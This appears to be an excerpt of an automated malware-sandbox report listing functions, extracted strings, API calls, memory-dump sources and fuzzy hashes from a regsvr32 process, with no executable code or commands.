Opcode Fuzzy Hash: 85ef3db7bf604a02f7d99419150aacfec47a9a91eb07b2f843a937ec8992523f
Instruction Fuzzy Hash: C0C1F621B1C95A4FE658F71C98A66B577D2FF9A320B04427ED48EC3293DD2DB8024786

Function 00007FFD3435B695 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435B7B4
@3A4, xrefs: 00007FFD3435B762
@3A4, xrefs: 00007FFD3435B807
@3A4, xrefs: 00007FFD3435B78B
@3A4, xrefs: 00007FFD3435B7E2

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4193656703
Opcode ID: 60f3017e7e4ebc8abfab9b23e10abb7a9cc47d3f959c44bf4ea54b0f5c8a4a4b
Instruction ID: cb3b450d86aa1ce21eb8ac847f0dfeac315a2442ee08246e864af05f756c0842
Opcode Fuzzy Hash: 60f3017e7e4ebc8abfab9b23e10abb7a9cc47d3f959c44bf4ea54b0f5c8a4a4b
Instruction Fuzzy Hash: 8741C721759A994FEB58F76894F22A9B7E1EF8A350F4402B6E04DC32C3DD3C78018782

Function 00007FFD34554A26 Relevance: 6.4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

Q4, xrefs: 00007FFD34554A5C
@3A4, xrefs: 00007FFD34554AEE
@3A4, xrefs: 00007FFD34554AA0
(b#4, xrefs: 00007FFD34554B27
L, xrefs: 00007FFD34554B59

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: (b#4$@3A4$@3A4$L$Q4
API String ID: 0-173553263
Opcode ID: 6f51dd11636fc79bc7f7d83624e066536dd4218180e7020a803f70263d15e3a7
Instruction ID: 8f2074b3ad8a20a824f669d03ed44e1bb0e229fb7b59a93afd5585170dc264b6
Opcode Fuzzy Hash: 6f51dd11636fc79bc7f7d83624e066536dd4218180e7020a803f70263d15e3a7
Instruction Fuzzy Hash: 3E411732F0D9454FEB99EB1888A26A5B3D1EF9A320B0401BAE14ED7283DD2CF8058745

Function 00007FFD34368954 Relevance: 6.4, Strings: 5, Instructions: 125COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343689D5
@3A4, xrefs: 00007FFD34368A1D
@3A4, xrefs: 00007FFD343689A7
@3A4, xrefs: 00007FFD3436897E
@3A4, xrefs: 00007FFD34368A7C

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4193656703
Opcode ID: 26469bf0c93a19b2b3562af2a22d087bc3fee19e8df738dd501cff297d6c4b91
Instruction ID: 26f74bc985968bdad2ea83747ff459a769d8ac52acf18f5ca0bf9efd91de71f2
Opcode Fuzzy Hash: 26469bf0c93a19b2b3562af2a22d087bc3fee19e8df738dd501cff297d6c4b91
Instruction Fuzzy Hash: FD410421B5EA8B4BF799FB5888F55B4A2C0FF9A260F04057AE54CD3293DD2CB8018746

Function 00007FFDA3382453 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33826C3
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID:
String ID: $/i:S$SYNC
API String ID: 0-2968757536
Opcode ID: 52e109eb80c539991cd9c790973fce2dece5765b26daa102c75c802937407dce
Instruction ID: 4ace35c9efa6286abce5e8fbd53fcb356b51ce1e72fdb9877c92357c60735c88
Opcode Fuzzy Hash: 52e109eb80c539991cd9c790973fce2dece5765b26daa102c75c802937407dce
Instruction Fuzzy Hash: ED028D3270EEC681EA31AB55F4507EAA362FB84784F004126DE8C67B9ADF7ED145CB44

Function 00007FFDA33824A2 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 322COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33826C3
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID:
String ID: $/i:S$SYNC
API String ID: 0-2968757536
Opcode ID: aa9a9cd3064d74a9b86100cbc379946e90ffc3ead70f38367e187b72343efcd9
Instruction ID: 2afc4fc9ba25f3f022da2aa175aea0df5c43a816aa3afa7991686e4cda27e367
Opcode Fuzzy Hash: aa9a9cd3064d74a9b86100cbc379946e90ffc3ead70f38367e187b72343efcd9
Instruction Fuzzy Hash: 82027C3270EEC681EA31AB55F4507EAA362FB84784F004126DE8C67B9ADF7ED145CB44

Function 00007FFDA3382435 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33826C3
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID:
String ID: $/i:S$SYNC
API String ID: 0-2968757536
Opcode ID: 79dfbac661689dd04925f9bda332d31a6ffb05789bc8c7a8735d8eb7b025bb02
Instruction ID: 44c3fea1f6721db607b65631700d6ca9cdc343affe2a40487e0aa4e8ee9b8a50
Opcode Fuzzy Hash: 79dfbac661689dd04925f9bda332d31a6ffb05789bc8c7a8735d8eb7b025bb02
Instruction Fuzzy Hash: 67028C3270EEC681EA31AB55F4507EAA362FB84784F004126DE8C63B9ADF7ED145CB44

Function 00007FFDA33824BA Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33826C3
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID:
String ID: $/i:S$SYNC
API String ID: 0-2968757536
Opcode ID: b8b2f81fc27a745220d86db47dd0eb80518589feba5ba8183af30f55b3bbc780
Instruction ID: a2bf2f9a849cf72987f8b0b535696a29f06306497111b946a1d81694b351b57f
Opcode Fuzzy Hash: b8b2f81fc27a745220d86db47dd0eb80518589feba5ba8183af30f55b3bbc780
Instruction Fuzzy Hash: 88027C3270EEC681EA31AB55F4507EAA362FB84784F004126DE8C67B9ADF7ED145CB44

Function 00007FFDA338248C Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

, xrefs: 00007FFDA33826C3
/i:S, xrefs: 00007FFDA3382546
SYNC, xrefs: 00007FFDA338254B

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID:
String ID: $/i:S$SYNC
API String ID: 0-2968757536
Opcode ID: 3d2ddbb27bd5ac5c2025ababf670fe11a272893392fb4342accfef381fe9b600
Instruction ID: 9ce8bb02c6918b140cd82be81b5bb36bd17533a77dbbc9e472e40b3689dfa9fb
Opcode Fuzzy Hash: 3d2ddbb27bd5ac5c2025ababf670fe11a272893392fb4342accfef381fe9b600
Instruction Fuzzy Hash: A6027D3270EEC681EA31AB55F4507EAA362FB84784F004126DE8C67B9ADF7ED145CB44

Function 00007FFDA33DFBD0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,?,?,00007FFDA33DF95C), ref: 00007FFDA33DFBF8
GetLastError.KERNEL32(00000000,?,?,00007FFDA33DF95C), ref: 00007FFDA33DFC57
CloseHandle.KERNEL32(00000000,?,?,00007FFDA33DF95C), ref: 00007FFDA33DFC98
CloseHandle.KERNEL32(00000000,?,?,00007FFDA33DF95C), ref: 00007FFDA33DFCA0

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseHandle$CreateErrorEventLast
String ID:
API String ID: 3743700123-0
Opcode ID: 98d2a2f06b653b22a13e2036d501e1887043cc6f1aa98077720f9b60e3440225
Instruction ID: 694e9c63062f1e0bd499325c623a6a5902953c31a9884956473153322b738fcf
Opcode Fuzzy Hash: 98d2a2f06b653b22a13e2036d501e1887043cc6f1aa98077720f9b60e3440225
Instruction Fuzzy Hash: 4411D522B0A74556F6599B12B5603793251AF88790F184035DE9C57BC3DF7DA0E28304

Function 00007FFD343673C8 Relevance: 5.3, Strings: 4, Instructions: 343COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34367565
@3A4, xrefs: 00007FFD34367604
@3A4, xrefs: 00007FFD343674C6
@3A4, xrefs: 00007FFD34367749

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 27cacc5043701a8a159ed5ead1c4c324f4aa739a0ae079bda6ad1d1b4812ed57
Instruction ID: 83405f4a81e6ede2f4d6c5e1bea40711216ed038bd5db1210186f9b3e8897aee
Opcode Fuzzy Hash: 27cacc5043701a8a159ed5ead1c4c324f4aa739a0ae079bda6ad1d1b4812ed57
Instruction Fuzzy Hash: 8ED1B731A1858A8FDB84EB58C4E5AA877E2FF99324F4401B9C50DD72D6DE3DB841DB40

Function 00007FFD3435C345 Relevance: 5.3, Strings: 4, Instructions: 342COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435C522
@3A4, xrefs: 00007FFD3435C47D
@3A4, xrefs: 00007FFD3435C5F0
@3A4, xrefs: 00007FFD3435C3F0

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 37c58622722faaab3e379903e79a40499343512e77cb56f7990ce37dc5b6609f
Instruction ID: af669c575dff1353c902948eb87b26048edfbcc1bb3f9ba598c40c2d7de1a512
Opcode Fuzzy Hash: 37c58622722faaab3e379903e79a40499343512e77cb56f7990ce37dc5b6609f
Instruction Fuzzy Hash: A8B12722B4C9894BF764F66888A62B97BD0FF96324F4404F9D14DC72C3DD2C784A9781

Function 00007FFD34556ABC Relevance: 5.3, Strings: 4, Instructions: 268COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34556B07
@3A4, xrefs: 00007FFD34556BA1
@3A4, xrefs: 00007FFD34556CCD
@3A4, xrefs: 00007FFD34556B31

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: eaa9e2801c26da36d9c4ba69dee1472a75f5c9dce72a1070720ce85115604632
Instruction ID: 1e77900c424220bd5e2f27153af8d886097fdf88e611f7e27d05375c2887ca1a
Opcode Fuzzy Hash: eaa9e2801c26da36d9c4ba69dee1472a75f5c9dce72a1070720ce85115604632
Instruction Fuzzy Hash: 2281C431F1D9494FEB99FB1884A66B977D2FB99320B040279D14FC3392DE2CB8019786

Function 00007FFD34366E36 Relevance: 5.2, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34366F1A
@3A4, xrefs: 00007FFD34366E8C
@3A4, xrefs: 00007FFD3436708E
@3A4, xrefs: 00007FFD34366E58

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 07add386c45082accd7baa6cf44db6c48ebc408c7bf4e9f116e366893263784f
Instruction ID: e1624290f28cbf8485ca8214e518570e4a42f19b41192202b916b6fd88adcfac
Opcode Fuzzy Hash: 07add386c45082accd7baa6cf44db6c48ebc408c7bf4e9f116e366893263784f
Instruction Fuzzy Hash: 49819030A5894A8FEB98FB58C4E5BA8B7E1FF99310F4041B9D10DD3292DE3CB8419B41

Function 00007FFD343668D3 Relevance: 5.2, Strings: 4, Instructions: 207COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34366976
@3A4, xrefs: 00007FFD343669C9
@3A4, xrefs: 00007FFD3436693D
@3A4, xrefs: 00007FFD34366A75

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: ae8f4191bb22f6a84aa0ecb4f38ad2ea70577a370aba4a6a16f42925ed22cc5f
Instruction ID: ec936c1cbce1d79c592ce6187e2700804633bb57721c83265fc1203823ac80f1
Opcode Fuzzy Hash: ae8f4191bb22f6a84aa0ecb4f38ad2ea70577a370aba4a6a16f42925ed22cc5f
Instruction Fuzzy Hash: 1551917174CA8A4FEB88FB18C8E16A573E1FB96324F00017AE54DC3282DE3CE8518745

Function 00007FFDA33967B0 Relevance: 5.2, APIs: 4, Instructions: 200COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FFDA339683C
TlsGetValue.KERNEL32 ref: 00007FFDA3396A18
TlsSetValue.KERNEL32 ref: 00007FFDA3396A28
TlsGetValue.KERNEL32 ref: 00007FFDA3396A7E

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 0d0c33d4ae84c9c6ac08cf005ca708583dd0807289b50ca2b2cc0b6748987ae7
Instruction ID: eef3e0dcaad35aa99d14fa07efe3b71d4c33c1665a008b70096123a1d59e20f4
Opcode Fuzzy Hash: 0d0c33d4ae84c9c6ac08cf005ca708583dd0807289b50ca2b2cc0b6748987ae7
Instruction Fuzzy Hash: A4A1B531B1EEC181FA559B19E0213F9A3A2FF94794F149131EA8C137A6EF7EE5818344

Function 00007FFD345581BD Relevance: 5.2, Strings: 4, Instructions: 198COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD345582BE
@3A4, xrefs: 00007FFD34558228
@3A4, xrefs: 00007FFD3455826A
(@^4, xrefs: 00007FFD34558371

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: (@^4$@3A4$@3A4$@3A4
API String ID: 0-69467789
Opcode ID: d1b43a2ba59b0ee81578f6a82121c250b568a910f5f7c8bfe7ab6ec6d6803145
Instruction ID: 09258fc9bf91a994b93453114272f134bbb6f73553a75b45bfb3ca1a92f394b8
Opcode Fuzzy Hash: d1b43a2ba59b0ee81578f6a82121c250b568a910f5f7c8bfe7ab6ec6d6803145
Instruction Fuzzy Hash: 50512A31F0DA8D4FDB56EB6858A55F97BE1EF8A310F0401BBD54DD3282DE2CA8058786

Function 00007FFD34555AE0 Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34555BB5
@3A4, xrefs: 00007FFD34555B7D
@3A4, xrefs: 00007FFD34555AE9
@3A4, xrefs: 00007FFD34555B33

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 130e18ff2d974fa5eb7ef59bff9bb8eeba13d3eb8c5b6950b47c5aaa1ec6292f
Instruction ID: b78b76da3b6d8f54ca2fe1690d454a80707b487890f1d82dc01743788eae347e
Opcode Fuzzy Hash: 130e18ff2d974fa5eb7ef59bff9bb8eeba13d3eb8c5b6950b47c5aaa1ec6292f
Instruction Fuzzy Hash: CC51F831F185894FE796AF6888A91F4BBE0EF96311F4401FAD50EC7297DC1CA8458741

Function 00007FFD3435F951 Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435FA63
@3A4, xrefs: 00007FFD3435F9F0
@3A4, xrefs: 00007FFD3435FA3C
@3A4, xrefs: 00007FFD3435F9A5

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: fb9aeb1e55abed02652b3677a81b803fc1bb01ad4999d242be284b89c10e35a2
Instruction ID: 84f330c673b82643d9a878f3fe73f37df803fd8bd0bf020b917e3d1e1b79490f
Opcode Fuzzy Hash: fb9aeb1e55abed02652b3677a81b803fc1bb01ad4999d242be284b89c10e35a2
Instruction Fuzzy Hash: C7410822B1DA894BE759B76C58661B577D0EF8B324F0406BBE14DC32C3ED2CB8014786

Function 00007FFD34356BD5 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34356CF4
@3A4, xrefs: 00007FFD34356C8A
@3A4, xrefs: 00007FFD34356C63
@3A4, xrefs: 00007FFD34356C3D

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 2ebf88be33784bdc978799caf1bf4d10aae630c818590e826c7a74a10f9dce5c
Instruction ID: 5a6227ea944a65b7a9ae86687ad45ee5013cdad40becfa2fc8b563a65bbc4efa
Opcode Fuzzy Hash: 2ebf88be33784bdc978799caf1bf4d10aae630c818590e826c7a74a10f9dce5c
Instruction Fuzzy Hash: C641E621B9EACA0FE799F76844B62A967D1EF96610B4801F9D44DC73D3DC2CBC424386

Function 00007FFD3435EE0D Relevance: 5.1, Strings: 4, Instructions: 134COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435EE41
@3A4, xrefs: 00007FFD3435EEE0
@3A4, xrefs: 00007FFD3435EE9F
@3A4, xrefs: 00007FFD3435EE73

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: b33a1169c8c5fbcc5697cc5d6034f78aec8ac692c6a3574bac0718db7e62b873
Instruction ID: fcbee1594f8245e5caa14287b754676074c4216ea1c6e24114ec3bf19d5156af
Opcode Fuzzy Hash: b33a1169c8c5fbcc5697cc5d6034f78aec8ac692c6a3574bac0718db7e62b873
Instruction Fuzzy Hash: 2441D63171DB884FEB54EF5888A65E9BBD1FB99314F0402BFE44CD3282DE29B4008746

Function 00007FFD3435BE18 Relevance: 5.1, Strings: 4, Instructions: 133COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435BE93
@3A4, xrefs: 00007FFD3435BE42
X?E4, xrefs: 00007FFD3435BF41
@3A4, xrefs: 00007FFD3435BE6F

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$X?E4
API String ID: 0-1827199398
Opcode ID: d38fa9057949e3fe96b2ab3e46c8e74ea0b9ee628a6d0f55d901236b50e04ded
Instruction ID: 1cd4e436d12d1942100dad9261f0e04c60cacc03af4d545d53d8af389202d4f9
Opcode Fuzzy Hash: d38fa9057949e3fe96b2ab3e46c8e74ea0b9ee628a6d0f55d901236b50e04ded
Instruction Fuzzy Hash: 90310622B4C9895FE799FB6898A62B8B7D1EF9A210F0801FAD54DC72C3DD3C78458741

Function 00007FFD3435F947 Relevance: 5.1, Strings: 4, Instructions: 124COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3435FA63
@3A4, xrefs: 00007FFD3435F9F0
@3A4, xrefs: 00007FFD3435FA3C
@3A4, xrefs: 00007FFD3435F9A5

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4
API String ID: 0-2486409910
Opcode ID: 6309be0400757c055c6b93c39c5d6cac011950fa6f0f95a2e23b8b5906f4d92f
Instruction ID: 9decaff21b0081fdb4681323e330dc8a75614adad9c45520486b36bfd64b0338
